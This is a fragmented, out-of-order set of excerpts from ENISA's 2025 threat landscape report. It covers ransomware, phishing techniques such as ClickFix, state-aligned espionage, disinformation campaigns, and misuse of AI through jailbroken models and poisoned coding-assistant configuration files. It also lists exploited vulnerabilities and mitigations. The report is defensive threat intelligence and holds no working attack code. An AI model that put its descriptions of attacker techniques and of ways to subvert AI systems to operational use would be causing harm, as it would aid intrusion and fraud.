8.2.2 Exploitation of strategic events Over the reporting period, 72.5% of cases of FIMI campaigns targeting Union entities and EU public institutions either targeted an event or opportunistically exploited current news. European institutions were targeted during the Polish elections mostly by the Doppelgänger campaign; this activity was complemented by Russian and Belarusian media. The IMS focused its efforts on targeting EU institutions, aiming to undermine key policies, particularly the Green Deal, while portraying Brussels as interfering in Poland’s sovereign decision-making381 382. Russian and Belarusian media activity focused on accusing the EU, especially its Commission and Parliament, of interfering in the Polish elections 383 384.

The prevalence of cybercriminal-led intrusions is illustrated through the type of malicious code deployed following intrusions, as well as the outcome of recorded intrusions. The combined share of ransomware, banking trojan, and infostealers accounts for 87.3% of these intrusions.

Out of recorded intrusions, 68.6% led to data breaches leaked on cybercriminal forums for sale, including 2.8% of these advertised breaches being presented as a direct outcome of a ransomware attack. Data exfiltration, including credential theft (8.9%) and strategic data collection (21.3%) accounted for 30.2%.

The distribution of threat categories shows a clear concentration in a few areas. Mobile threats account for the largest share at 42.4%, highlighting how mobile devices continue to be a primary attack surface. Web threats follow with 27.3%, underlining the persistent exploitation of online services and applications. Operational technology threats represent 18.2%, reflecting the growing exposure of industrial and critical systems as they continue being increasingly connected and targeted. Supply chain risks make up 10.6%, showing that attackers are actively leveraging indirect pathways through third-party providers and dependencies.

This is notably illustrated by NoName057(16) explicitly mentioning announcements by Czechia, Latvia and Poland related to new bilateral security agreements with Ukraine as a trigger to target transport entities in these EU MSs113 114 115. In December 2024, Italy’s Malpensa and Linate airport portals were briefly unreachable in attacks later claimed by NoName057(16)116 117 118, likely in the context of Italy’s government decree to authorise the transfer of means, materials and equipment to Ukraine .

Cybercrime incidents against the transport sector accounted for 8.4% of all incidents, with ransomware accounting for 83.9% and data breaches 16.1% of cybercrime incidents. Top three ransomware claims against the EU transport sector include Akira (12.9%), INC Ransom (9.7%), and Cl0p (9,7%). Despite being a small share of recorded events, ransomware displayed a more disruptive impact in a few cases. For instance, following an incident reportedly involving Akira ransomware, the Split Airport in Croatia saw the disruption of the passenger reception information system, ultimately impacting the landing and take-off of aircrafts and leading to a temporary suspension of all flights119 120.

platforms, mostly X, Bluesky and, in some cases, Reddit368. Identified content focuses on portraying the EU as a hegemonic power interfering in Member States politics, particularly undermining their democratic processes by alleging that the EU is persecuting opposition parties and even attempting to ban them or violating human rights369.

8.1.2 Other Information Manipulation Sets In August 2024, an open-source publication documented an information operation aligned with China’ strategic interests through social networks370. Named Green Cicada Network, this campaign operated a botnet comprised of 5 000 AI-operated accounts on X, notably accounts purportedly originating from the EU, to target Western Europe audiences. This campaign is assessed as being carried out by Yukuo Cen (aka cenyk1230), a Chinese AI researcher employed at Zhipu AI, a company allegedly tied to the People's Liberation Army and Chinese intelligence services. Of interest is the convergence, mutual learning and increasing alignment between Chinese and Russian IMS, and the adoption of Russian FIMI disinformation TTPs by China, leading to overlapping narratives and coordinated influence operations where Russian and Chinese networks mutually amplify content, to notably spread anti-Western narratives – notably when Chinese state-controlled media offer a platform to sanctioned Russian outlets 371 372. January 2025 saw the targeting of Spain in the China-aligned Spamouflage operation since December 2024, leveraging the floods in Valencia, Spain, to call for the overthrow of the Spanish government373. Also identified over the reporting period were Iran-aligned influence operations pertaining to the participation of Israel in the Olympics374 375, as well as operation A2Z, a campaign sharing similarities with VIGINUM’s (U) notorious BIG, associated to the Baku Initiative Group (BIG)376 377, notably targeting audiences in France, Italy, Poland and Germany378.

8.2 KEY FIMI TRENDS 8.2.1 Tactics, Techniques and Procedures (TTPs) FIMI activities targeting EU entities and public institutions in Member States leverage a wide array of techniques as defined by the DISARM framework379. • The use of Inauthentic news articles. This was the most common type of content to convey narratives against EU entities and public institutions in EU MSs (T0085 Develop Text-Based Content, T0140.001 Defame, T0066 Degrade Adversary). Articles are often transformed into social media posts either by taking the headline or a text extract to be amplified across platforms (T0084 Reuse Existing Content). • Fabricated investigations. EU entities and public institutions in EU MSs were the subject of fabricated investigations (T0085 Develop Text-Based Content, T0023.001 Reframe Context). Often originated by the Russian Foundation to Battle Injustice, the content was laundered through inauthentic websites and unattributed channels posting across platforms (T0119 Cross-Posting; 37.2%). It was translated and shared across multiple inauthentic websites and accounts on X (T0003 Leverage Existing Narratives, T0049.003 Bots Amplify via Automated Forwarding and Reposting). • Decontextualised quotes and images. FIMI actors aimed to discredit EU officials by decontextualising and reframing statements, image or previously published content (T0023.001 Reframe Context). While the

1. EXECUTIVE SUMMARY This year’s ENISA Threat Landscape (ETL) introduces a revised and concise format designed to deliver insights through a threat-centric approach and enhanced contextualisation. This edition integrates additional analysis of adversary behaviours, vulnerabilities and geopolitical drivers, aimed at both strategic and operational audiences, offering an actionable perspective on trends shaping the EU’s cyber threat environment. The ETL 2025 provides an overview of the European cyber threat ecosystem from July 2024 to June 2025, drawing on nearly 4 900 selected and curated incidents. The reporting period highlights a maturing threat environment characterised by rapid exploitation of vulnerabilities and growing complexity in tracking adversaries. Intrusion activity remains significant, with ransomware at its core. Cybercriminal operators notably responded to the actions of law enforcement by decentralising operations, adopting aggressive extortion tactics and capitalising on regulatory compliance fears.

The continuous proliferation of ransomware-as-aservice models, builder leaks and the services of access brokers has further lowered barriers to entry and diversified ransomware families, fuelling a professionalised and resilient criminal ecosystem. In parallel, state-aligned threat groups intensified their long-term cyberespionage campaigns against the telecommunications, logistics networks and manufacturing sectors in the EU, demonstrating advanced tradecraft such as supply chain compromise, stealthy malware frameworks and abuse of signed drivers. Hacktivist activity continues to dominate reporting, representing almost 80% of recorded incidents and driven primarily by low-level distributed denial-of-service operations. While overall resulting in very low impact, these campaigns demonstrate how low-cost tools are scaled for ideology-driven operations. Sectoral targeting patterns reinforce the EU’ systemic exposure.

Public administration networks remain the primary focus (38%), notably for hacktivists and state-nexus intrusion sets, while transport emerged as a high-value sector, particularly maritime and logistics. Aviation and freight operations have faced ransomware disruptions, while digital infrastructure and services remain strategic targets for both cyberespionage and ransomware operators. Phishing remains the dominant intrusion vector (60%) and is evolving through techniques used in largescale campaigns. The availability of phishing-as-a-service platforms demonstrates the industrialisation of phishing operations, enabling adversaries of all skill levels to launch complex campaigns. Abuse of cyber dependencies have also intensified, as shown by compromises in open-source repositories, malicious browser extensions and breaches of service providers, amplifying risk throughout interconnected digital ecosystems.

Across all campaigns, adversaries continue to rely on a consistent set of tactics, techniques and procedures. Vulnerability exploitation remains a cornerstone of initial access (21.3%), with widespread campaigns rapidly weaponising them within days of their disclosure—underscoring the need to ensure patch availability and to implement and enforce basic measures for cyber hygiene. Artificial intelligence has become a defining element of the threat landscape. By early 2025, AIsupported phishing campaigns reportedly represented more than 80 percent of observed social engineering activity worldwide, with adversaries leveraging jailbroken models, synthetic media and model poisoning techniques to enhance their operational effectiveness. The threat landscape depicted in this edition reflects how the cyber threat landscape is shifting toward mixed, possibly convergent pressure, with fewer single high impact incidents, and more continuous, diversified and convergent campaigns that collectively erode resilience.

6. CYBERCRIME While accounting for 13.4% of all incidents, cybercrime continued to remain a prevalent threat for the short-tomedium term, with encrypting ransomware constituting the most directly impactful threat. Over the reporting period, cybercrime activities targeting EU organisations notably included ransomware (81.1%) and data breaches (15.2%); the latter were specifically documented as resulting from ransomware incidents. The cybercriminal ecosystem structure was regularly impacted by the operations of Law Enforcement Agencies (LEA) and internal competition among cybercriminal groups.

6.1 KEY CYBERCRIME THREATS Based on monitored Data Leak Sites (DLS) and cybercriminal forums, cybercrime claims accounted for 81% of activities. Known EU victims include a broad range of sectors, with at least 36 sectors identified in total, including critical sectors as shown in the NIS2 Directive, with DIS and the manufacturing sector remaining the most impacted in the EU. Over the reporting period, data breaches primarily impacted EU digital infrastructure and services (27.7%), notably through the sale of customer data from telecommunications providers, followed by the sale of data related to public administration (17%). Ransomware claims were made primarily against the manufacturing sector (14.9%). While the recorded share of ransomware deployments remained stable, a shift in the ransomware ecosystem was observed over the reporting period, marked by a continuous fragmentation, ultimately leading to the emergence of new ransomware variants and Ransomware-as-a-Service (RaaS) programmes. A total of 82 ransomware variants were reportedly deployed against EU MSs organisations, with Akira emerging as the most frequently deployed (11.6%), followed by SafePay (10.1%), and Qilin (7.5%). While a few major groups and ransomware strains were particularly prevalent in the previous reporting period, activity in 2024–2025 was more evenly distributed. This evolution is clearly illustrated by LockBit3, which accounted for nearly a quarter of all reported claims over the previous reporting period (ETL 2024) with 198 claims. In May 2025, the LockBit ransomware programme was reportedly compromised resulting in the leak of their internal database, which is likely justifying the absence of claims of this group since 27 May 2025140 and the emergence of LockBit4 since April, notably leveraged by an operator called Syrphid 141. Similarly, a decrease in 8Base’s deployments followed partial infrastructure leaks and administrator arrests in early 2025142. Showing a significant decrease in EU deployments (0.73%) against Austrian, French, German and Italian organisations, BlackBasta stopped claiming incidents altogether since January 2025. In February, the BlackBasta group saw their internal chat messages leaked, exposing disagreements among members as well as its toolset, eventually leading to the group’s infrastructure going offline143 144.

While low overall (4.1%), the targeting of the EU transport sector by state-nexus threat groups was dominated by China-nexus and Russia-nexus intrusion sets (46.7%). China-nexus intrusion sets, including Mustang Panda, UNC5221 and APT41, notably focused on maritime and shipping and logistics subsectors across multiple EU MSs. This activity aligns with Beijing’ strategic interest in securing maritime supply chains and transport corridors tied to the Belt and Road Initiative, as well as maintaining visibility over European trade infrastructure. Russia-nexus intrusion sets, notably APT28, seemingly focused on air transport, logistics and freight, particularly in Germany, France and Belgium, likely reflecting Moscow’s broader strategy to target the critical infrastructure of NATO Allies, especially in the context of the war in Ukraine.

Smaller shares are associated to DPRK-nexus Lazarus (6.7%), possibly aiming at gathering strategic data pertaining to the evasion of sanctions. Rare Werewolf’s activity against logistics of an EU MS represent a residual threat, likely linked to spill over activities.

5.3 DIGITAL INFRASTRUCTURE AND SERVICES For the purpose of this report, the notion of digital infrastructure and services (DIS) includes the digital infrastructure sector in accordance with NIS2, as well as incidents related to digital providers and ICT service management. With a share of 4.8% of overall incidents, DIS comes third in the top five targeted sectors across the EU over the reporting period. While the targeting of DIS likely stems from the sector being of high value for collecting data and disrupting services at a larger scale, it is likely this also speaks to the dispersed nature and heterogeneous levels of maturity of the organisations comprising this ecosystem.

Microsoft Exchange Server 2016 Cumulative Update 19 Microsoft Exchange Server 2016 Cumulative Update 19 Microsoft Exchange Server 2019 Microsoft Exchange Server 2019 Microsoft Exchange Server 2013 Cumulative Update 23 Windows 10 Version 1809 Microsoft Exchange Server 2013 Cumulative Update 23 Microsoft Exchange Server 2013 Cumulative Update 23

CVE20214034 CVE202142278 CVE202144026 CVE202227924 CVE20223236 CVE202241128 CVE202320118 CVE202320198 CVE202322515 CVE202322527 CVE202323397

EUVD202133934 EUVD202129254 EUVD202130885 EUVD202232412 EUVD202242644 EUVD202244371 EUVD202324297 EUVD202324377 EUVD202326655 EUVD202326667 EUVD202327497

CVE- EUVD2023- 202327350 31126 CVE202327532 CVE202328461 CVE202334048 CVE20233519 CVE202338831 CVE202342793 CVE202343770 CVE202346604 CVE202346747 CVE202348788 CVE20240012 CVE202420399 CVE202421287 CVE202421338 CVE202421412 CVE202421762

EUVD202331287 EUVD202332140 EUVD202338166 EUVD202344176 EUVD202342604 EUVD202347222 EUVD202348147 EUVD20232719 EUVD202350916 EUVD202352821 EUVD202415815 EUVD202418114 EUVD202419000 EUVD202419050 EUVD202419121 EUVD202419376

use of deepfakes73 74 75 76 77 78 79, as well as for malware development80 81 82 83. Threat groups were observed to be leveraging commercial LLMs to augment operations, as well as jailbroken or retrained (diverted) LLMs such as WormGPT, EscapeGPT and FraudGPT, to automate social engineering activities and accelerate the development of malicious tools84 85. China-nexus, Iran-nexus and DPRK-nexus intrusion sets were reported using AI solutions, including Google's Gemini86 and OpenAI’s ChatGPT87, primarily as research assistants for boosting productivity as well as for reconnaissance and anomaly detection evasion. Famous Chollima was notably seen using AI to generate convincing LinkedIn profiles and support communications with victim organisations88 89 90. The emergence of allegedly stand-alone malicious AI systems over the past two quarters, such as Xanthorox AI, likely indicates a trend of threat groups moving beyond jailbreaks towards customised tools running on local servers to avoid detection91.

Another noteworthy trend is the use of AI as a lure, in the context of the rising popularity of generative AI. Multiple sources reported the proliferation of fraudulent websites, impersonating legitimate AI tools such as Kling AI, Luma AI, Canva Dream Lab and DeepSeek-R1, to deliver malware92 93 94 95 96 97 98. Further reporting included the deployment of ransomware and malware masquerading as legitimate AI tool installers99. Also observed was the targeting of the AI supply chain, with poisoned hosted machine learning (ML) models and Python Package Indexes (PyPI) reportedly used to distribute trojanised packages 100, and a supply chain attack vector called ‘Rules File Backdoor’, enabling the injection of malicious instructions into configuration files that AI coding assistants use, like Cursor and GitHub Copilot101. Interestingly, and as generative AI becomes increasingly integrated into software development, the term ‘slopsquatting’ was introduced102.

Although publicly available evidence suggests that misuse of LLMs and other AI tools occurs more frequently than direct efforts to compromise AI systems, researchers identified multiple Proofs of Concept (PoC) by which an intrusion set could subvert the intended function of AI models for malicious purposes103. The increased integration of AI systems into enterprise environments introduces a potentially vulnerable new attack surface. AI software is not immune to vulnerabilities, as exemplified by the critical remote code execution vulnerability discovered in Langflow or Microsoft 365 Copilot 104. The infrastructure on which AI systems rely to operate has also been found vulnerable, for instance through CVE-2024-27564, a Server-Side Request Forgery vulnerability present in commit f9f4bbc, used within OpenAI’s ChatGPT system105.

Based on assessed objectives, cyber activities targeting or impacting the EU mostly pertained to ideology-driven incidents exclusively carried out by hacktivists through DDoS. Financially motivated operations were primarily carried out by cybercriminal operators, while a few cases were associated to hacktivist groups, and state-aligned threats. Finally, cyberespionage campaigns accounted for 7.2%.

4. GENERAL KEY TRENDS 4.1 PHISHING REMAINS A PRIMARY INITIAL INTRUSION VECTOR Phishing continued to be the primary method for initial intrusion, remaining an effective technique to carry out credential theft, session hijacking, payload deployment or command execution. ClickFix-style scams appeared during the reporting period with the technique gaining momentum in Q1 2025 for both cybercriminal and state-aligned intrusion sets3, often disguised as fake CAPTCHA prompts on compromised or fraudulent websites4. These overlays tricked users into executing PowerShell commands under the pretext of human verification, leading to the installation of information stealers and loaders 5. Another innovative technique was the weaponisation of compromised WordPress sites to distribute infostealers through drive-by downloads. From Q2 2025, threat actors embedded fake CAPTCHA and verification prompts into compromised websites to lure users into executing malicious payloads. The ClearFake campaign saw the distribution of credential-stealing malware including Lumma and Vidar, resulting in 9 300 confirmed infections. These campaigns leveraged legitimate browser interfaces and social engineering to create convincing lures6. Phishing-as-a-Service (PhaaS) platforms, designed to automate the generation of branded phishing kits by cloning login pages and distributing links through templated infrastructure, enable low-skill operators to emulate trusted brands. This is illustrated by the Darcula platform, seen impersonating more than 200 organisations, whose services were seen leveraged to target victims in more than a hundred countries 7. Another PhaaS called Lucid expanded their portfolio by supporting phishing campaigns via mobile messaging services—iMessage and RCS— enabling over 169 targets in 88 countries8 to be reached. Additional PhaaS developments include FlowerStorm, an adversary-in-the-middle kit mimicking Microsoft 365 portals and bypassing MFA9. Enabling endpoint protections evasion and email filtering, QR code phishing (aka quishing) was also reportedly seen, as observed in the Scanception campaign, where malicious QR codes embedded in PDF attachments were aimed at redirecting victims to credential harvesting pages hosted on trusted cloud platforms; these targeted users globally, including in the EU1011.

4.2 INCREASINGLY TARGETED CYBER DEPENDENCIES During the reporting period, cybercriminals increasingly targeted third-party providers, such as Digital Services, highly likely as an opportunity to optimise the efficiency of their attacks1213. In mid-2024, the cyberespionage campaign Operation Digital Eye targeted professional IT providers in Southern Europe, aiming to infiltrate supply chains. Compromise attempts were reportedly unsuccessful 14. In March 2025, Plus Service, an external provider managing the Telemaco platform for multiple Italian transport companies suffered a data breach involving unauthorised exfiltration to a remote cloud, prompting temporary access restrictions while remediation was carried out. This notably resulted in the Mobilita di Marca (MoM) ticketing systems being paralysed for two days, impacting several thousand commuters 15. The same campaign

Third-party sources are quoted as appropriate. ENISA is not responsible or liable for the content of the external sources including external websites referenced in this publication. Neither ENISA nor any person acting on its behalf is responsible for the use that might be made of the information contained in this publication. ENISA maintains its intellectual property rights in relation to this publication.

COPYRIGHT NOTICE © European Union Agency for Cybersecurity (ENISA), 2025 This publication is licenced under CC-BY 4.0 “Unless otherwise noted, the reuse of this document is authorised under the Creative Commons Attribution 4.0 International (CC BY 4.0) licence (https://creativecommons.org/licenses/by/4.0/). This means that reuse is allowed, provided that appropriate credit is given and any changes are indicated”. For any use or reproduction of photos or other material that is not under the ENISA copyright, permission must be sought directly from the copyright holders. ISBN: 978-92-9204-723-8 ISSN: 2363-3050 DOI: 10.2824/1946374

Lumma Stealer (aka LummaC2 Stealer) is a C language information stealer available through a Malware-as-aService (MaaS) model on Russian-speaking forums since at least August 2022154 155. Data is exfiltrated to a C2 server via HTTP POST requests using the user agent TeslaBrowser/5. The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell 156 , allowing for the leveraging of this malware by ransomware operators and state-nexus intrusion sets157. Assessed as having remained the most prevalent info-stealer since the beginning of 2025, Lumma was reportedly deployed on 394,000 Windows machines globally between March and May 2025, with a strong prevalence in the EU 158. In May 2025, joint international LEA action coordinated by Europol led to the seizing, takedown, suspension and blocking of approximately 2 300 malicious domains in Lumma’s infrastructure 159.

A few days following the takedown, Lumma seemingly resumed their operations 160. Data breaches continued being observed, with high visibility cases pertaining in particular to public administration, digital infrastructure and services, and finance in the EU, and typically sold on forums by Initial Access Brokers (IAB), ultimately leading to their exploitation in follow-up malicious cyber activities, including phishing campaigns. Notable examples during the reporting period included the compromise of contact details for over 62 000 Dutch police staff161 162and the data of 3.2 million Belgian WhatsApp users advertised on BreachForums163 as well as the personal and banking details of 15 000 customers of Direct Assurance, a French company164 and claims of stolen source code and credentials of the Swedish company Nokia via a third-party vendor165. The IAB economic model was seen to be evolving, notably shifting toward lower-cost, higher-volume sales, with most accesses reportedly priced under EUR 2 800 (about USD 3 000)166.

IAB activities also expanded, with a sharp increase of VPN access sale in 2024 167, while the sale of Personally Identifiable Information (PII) and Remote Desktop Protocol accesses remained stable. Predictably, online scamming and fraudulent activity continued, and was noted over the reporting period. While this type of basic activity is often given less attention in cyber security focused reporting, its simplicity and ubiquity merits at least a cursory mention. Recent cases illustrate how these seemingly ‘low-level’ scams can evolve into complex, transnational criminal enterprises. In Poland, authorities dismantled an international cybercrime group that impersonated bank and law enforcement officials, defrauding dozens of victims of nearly €570,000 (USD665,000) through spoofed calls and fraudulent transfers 168. On a much larger scale, a Chinese group named Vigorish Viper was found to be behind illegal online gambling operations advertised across European football stadiums 169.

Vigorish Viper was also linked to human trafficking and cyber fraud compounds in Southeast Asia. Meanwhile, a Dutch court recently sentenced an individual for phishing, bank helpdesk fraud and VIN fraud 170.

Known Exploited Vulnerability: A KVE is a vulnerability that is officially known as having been exploited during an attack or incident. The US Cybersecurity and Infrastructure Agency (CISA)497 maintains a catalogue of known exploited vulnerabilities. Organisations should use the KEV catalogue as an input to their vulnerability management prioritisation framework. Hereunder is a list of vulnerabilities documented as having been exploited in order to target EU organisations in open sources. CVE CVE20152051 CVE20170144 CVE20170147 CVE20170199 CVE201711882 CVE201718368 CVE20180802 CVE20180824 CVE201810957 CVE201813379 CVE20190604 CVE20200787 CVE20201472 CVE202035730 CVE202126084

EUVDCVSS ID EUVD10 2015(v2.0) EUVD8.8 2017(v3.1) EUVD7.5 2017(v3.1) EUVD7.8 2017(v3.1) EUVD7.8 2017(v3.1) EUVD9.8 2017(v3.1) EUVD7.8 2018(v3.1) EUVD8.8 2018(v3.1) EUVD8.8 2018(v3.0) EUVD9.1 2018(v3.1) EUVD9.8 2019(v3.1) EUVD7.8 2020(v3.1) EUVD5.5 2020(v3.1) EUVD6.1 2020(v3.1) EUVD9.8 2021(v3.1)

The EU public administration sector continued facing ransomware incidents (2.2%), which were particularly prevalent against municipalities. The most reported strains used against the public administration sector included NightSpire (41.7%), SafePay (33.3%), and Stormous (25%) ransomware. While accounting for 26 events against the EU’s public administration sector in the last ETL iteration, the LockBit ransomware was not seen to be active over this reporting period, highly likely as a consequence of law enforcement’s Operation Cronos in February 2024108. Data breaches relevant to the EU public administration accounted for 17% of all recorded data breaches.

Overall, the targeting of the public administration by State-nexus intrusion sets underscores a focus on diplomatic, and governmental entities, with Russia-nexus and China-nexus offensive cyber activities displaying the broadest sectorial spread, and India-nexus activity showing a clear unique focus on this sector. With a total of 77 incidents, and excluding unidentified sectorial targeting, public administration was the most targeted sector by state-nexus intrusion sets in the EU, for cyberespionage purposes. China-nexus intrusion sets including APT31, Mustang Panda, and APT17 notably focused on government entities across several EU member states including ministries of foreign affairs and municipal administrations.

2. METHODOLOGY The ENISA Cybersecurity Threat Landscape (ENISA CTL) updated methodology published in August 2025 1 was used to write the ETL. For the purpose of the ETL 2025 report, ENISA analysts collected and analysed 4 875 incidents, mainly based on information from open sources, as well as anonymised information shared by EU Member States (EU MSs) and members of the ENISA Cyber Partnership Programme2. The reporting period referred to spans from 1 July 2024 to 30 June 2025, with the cut-off date being 30 June 2025. As much as possible, primary sources are referenced in footnotes to substantiate ENISA’s analysis and assessments. ENISA appreciate that open sources and information shared voluntarily do not constitute a complete picture of the cyber threat landscape. Moreover, multiple caveats are inherent to open-source reporting. Those notably include reporting depth and temporality. For instance, vague sectorial or geographic reporting (i.e., ‘private companies’, ‘Europe’) is likely to impact ENISA’s dataset.

Another caveat is the proper sectorial categorisation, especially when one incident impacts an organisation operating in multiple sectors. To avoid inflating the threat, ENISA analysts proceeded to a thorough curation of the dataset either by choosing one specific sector or by registering the incident as ’unknown’. While particular attention was paid to the matter, it is highly likely a deviation will remain. It should be noted that incidents are not necessarily reported immediately or confirmed in open sources. For instance, where ransomware and DDoS are more immediate ‘visible’ threats, often claimed directly by their operators, cyberespionage campaigns are typically documented with a delay spanning from 6 months to more than 4 years. It should also be noted that, to some extent, increased reporting of a specific threat does not necessarily reflect an increased tempo but rather speaks to the audience’s interest.

The incidents analysed in the Foreign Information Manipulation and Interference (FIMI) section have been shared by the European External Action Service (EEAS) and based on the strategic FIMI monitoring efforts of the EEAS. They reflects patterns seen in known sources related to overt FIMI, or independently imputed operations by selected actors and on priority issues of the EEAS. The totality of the incidents used in the EEAS sample refers to activities suspected to be linked to Russian Information Manipulation Sets to different degrees. Data on cyber-related FIMI activities by other threat groups are not systemically collected. The evidence presented serves illustrative purposes and should not be used to draw conclusions about general trends in FIMI, as it reflects only a limited subset of threat actors’ activity. Hence, this report should be seen as an overview of prevailing trends, constituting a snapshot of threats faced by EU MSs and EU-based organisations.

To differentiate between what was reported by other sources and ENISA’s assessments, words of estimative probability are used, with a matrix available in the Appendix. Finally, the association of a threat with a particular nexus is solely based on attribution done by national authorities globally, and imputation (aka technical attribution) achieved by trusted private vendors, all referenced accordingly.

6.2 CYBERCRIME SECTORIAL IMPACT Cybercriminal activities continued to impact multiple sectors in the EU in both NIS2 and non-NIS2 sectors. Over the reporting period, digital infrastructure and services was identified as the most targeted sector (13.7%), followed by manufacturing (13.26%) and business services (9.7%).

Within cybercrime activities, ransomware operators primarily claimed attacks against the manufacturing sector (14.9%) and DIS (10.3%). Data breaches were primarily claimed against DIS (28.2%) and public administration (16.8%). Overall, cybercrime incidents showed a broadly distributed targeting pattern, likely underscoring prioritisation of achieving their lucrative-driven objectives over sector-specific targeting. In the second half of 2024, multiple ransomware incidents reportedly resulted in service disruption and/or interruption of EU organisations171 172 173 174 175 176 177 178. Of interest is the wave of incidents that impacted the French media industry, with three incidents impacting the sector in less than two months179 180 181. As leveraged ransomware strains or initial intrusion vectors are not known, it is not possible to assess whether these incidents stemmed from similar entry points, third party attacks or connections to specific geopolitical contexts.

While ransomware attacks inherently impact the confidentiality, integrity and accessibility of data, assessing their economic, operational and reputational impacts remains challenging. Over the reporting period, a limited number of attacks impacting EU companies claimed by ransomware operators were acknowledged, and the operational impact was documented in very few cases. While it is likely some claims are preposterous and ransomware attacks do not systematically impact operations, under-reporting and the superficial documentation of ransomware attacks in open sources are additional reasons for this intelligence gap.

7.1.3 North Korea-nexus intrusion sets Over the reporting period, DPRK-nexus intrusion sets were also seen to be active in the EU, particularly in Belgium, Italy, Germany and France. Famous Chollima was reportedly the most active, followed by Lazarus and Kimsuky. DPRK-nexus activity is heavily skewed toward EU private companies, with a focus on Human Resources, financial services (including crypto) and technology277 278.

In addition to continuous job-themed campaigns notably conducted by Lazarus to target EU entities involved in the defence, aerospace, media, health and energy sectors279 280 281, Famous Chollima was seen as increasingly active, seeking employment as IT workers globally, including in EU companies, notably defence and government-related entities282 283 284 285 286 287. Following sanctions and indictments from US authorities288 289 290 291, Famous Chollima reportedly increased their activities in the EU since at least Q4 2024292 293 294 295 296 297. As an illustration of historical dual motivated DPRK-nexus alleged objectives, Famous Chollima operators were seen carrying out cyberespionage through strategic data collection and were reportedly leveraging extortion schemes upon termination of their contracts to generate revenues298. While being continuously active against the Republic of Korea over the reporting period, Kimsuky was observed targeting a RoK based EU defence company and is suspected of having conducted spearphishing activities against EU embassies299.

Based on CISA’s catalogue of Known Exploited Vulnerabilities (KEV)488, 245 vulnerabilities were added over the reporting period, for which the top ten mentioned vendors concerned are displayed in Figure 47.

The top three Common Weakness Enumeration related to known exploited vulnerabilities in the reporting period are: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'), CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), and CWE416: Use After Free. All these weaknesses can cause vulnerabilities that allows in memory modification, code execution which could lead to take full control of the impacted system, as well crashes and denial of service, impacting the availability of the services run on or through the impacted system.

CVE202438178 CVE202438213 CVE202438226 CVE202438475 CVE202438812 CVE202438813 CVE202438856 CVE202440711 CVE202442009 CVE202443047 CVE202443451 CVE202445195 CVE202445519 CVE202450302 CVE202450623 CVE202453104 CVE20247971

EUVD202437148 EUVD202437180 EUVD202437192 EUVD202437356 EUVD202437703 EUVD202437704 EUVD202437643 EUVD202438578 EUVD202439391 EUVD202440024 EUVD202440720 EUVD202441762 EUVD202441520 EUVD202444804 EUVD202445217 EUVD202451776 EUVD202448804

Cloud Services Appliance (CSA) Cloud Services Appliance (CSA) Cloud Services Appliance (CSA)

CVE20250108 CVE20250282 CVE20250411 CVE202520188 CVE202521590 CVE202522457 CVE202524054 CVE202524200 CVE202524989 CVE202526633 CVE202527363 CVE20252783 CVE202529824 CVE202530406 CVE202531161 CVE202531324 CVE202532433

EUVD20251505 EUVD20251580 EUVD20251658 EUVD202513907 EUVD20256303 EUVD20259646 EUVD20256336 EUVD20253671 EUVD20254642 EUVD20256311 EUVD20256367 EUVD20258225 EUVD202510122 EUVD20259671 EUVD20259910 EUVD202511987 EUVD202511793

CVE- EUVD2025- 202532756 14705 CVE202533053 CVE202533073 CVE202537899 CVE202543200 CVE20254427 CVE20254428 CVE20254664 CVE202549113 CVE20255419 CVE20255777 CVE20256019 CVE20256543

M1051: Update Software, M1050: Exploit Protection, M1048: Application Isolation and Sandboxing, M1019: Threat Intelligence Program, M1038: Execution Prevention

M1022: Restrict File and Directory Permissions, M1029: Remote Data Storage, M1041: Encrypt Sensitive Information

M1041: Encrypt Sensitive Information, M1029: Remote Data Storage, M1022: Restrict File and Directory Permissions

M1027: Password Policies, M1018: User Account Management, M1026: Privileged Account Management, M1032: Multi-factor Authentication, M1013: Application Developer Guidance, M1017: User Training, M1015: Active Directory Configuration, M1036: Account Use Policies

M1049: Antivirus/Antimalware, M1038: Execution Prevention, M1022: Restrict File and Directory Permissions, M1050: Exploit Protection

Among DIS entities, the most impacted sub-sectors include telecommunications (25.1%), and digital services providers (DSP) (13.4%). Hacktivist-led DDoS attacks against DIS websites accounted for 57.5% of attacks on EU DIS, with NoName057(16) (33.8%), Keymous+ (21.4%) and Mr Hamza (6.5%) reportedly the most active groups.

Representing 34.3% of overall incidents, the cybercrime threat to EU DIS includes data breaches (38%) and the deployment of Cl0p (9.8%), FOG, and Qilin (6.5%). It is highly likely DIS is perceived as a target of interest due to the amount and criticality of data they hold, as well as the opportunity to disrupt services across a large number of organisations, sectors and EU MSs, increasing the likelihood of ransom demands being met.

7.1.4 Rest of the World (RoW) Other state-nexus activities targeting the EU over the reporting period included offensive cyber operations associated to India, Iran and PSOAs. Shifting from their historical regional targeting and emerging in the EU in Q2 2024, India-nexus intrusion sets including Bitter and SideWinder conducted continuous spearphishing campaigns, notably against EU embassies throughout the reporting period 300 301 302. Their activities used lures with names referencing EU–India trade negotiations, security dialogues or maritime cooperation, likely reflecting India’s interest in understanding EU policy positions in the Indo-Pacific, maritime security frameworks and technology transfer controls. The activities of Iran-nexus intrusion sets displayed a low tempo with a narrow and clear focus on civil society and NGOs, followed by public administration and transport. Active intrusion sets in the EU over the reporting period include MuddyWater303, APT42304, Charming Kitten305, and subclusters UNC3313 and UNC5667306.

While the targeting of civil society and NGOs aligns with the historical activities of Iran-nexus intrusion sets for the surveillance of Iran’s diaspora and dissidents in the EU, it is likely the targeting of an EU MS government would have been driven by the 12-day war between Israel and Iran. Reportedly linked to Belarus, Ghostwriter continuously targeted Poland in spearphishing campaigns against its public administration, specifically governmental and institutional entities 307 while continuing focusing on Ukrainian targets. Assessed to likely be a spill over of offensive cyber activities in the context of conflicts, pro-Houthi intrusion sets OilAlpha308 and Rare Werewolf309 were reported impacting EU individuals and organisations on at least one occasion over the reporting period. Finally, the abuse of technologies commercialised by Private Sector Offensive Actors, including Candiru, NSO Group and Paragon Solutions continued targeting civil society in the EU.

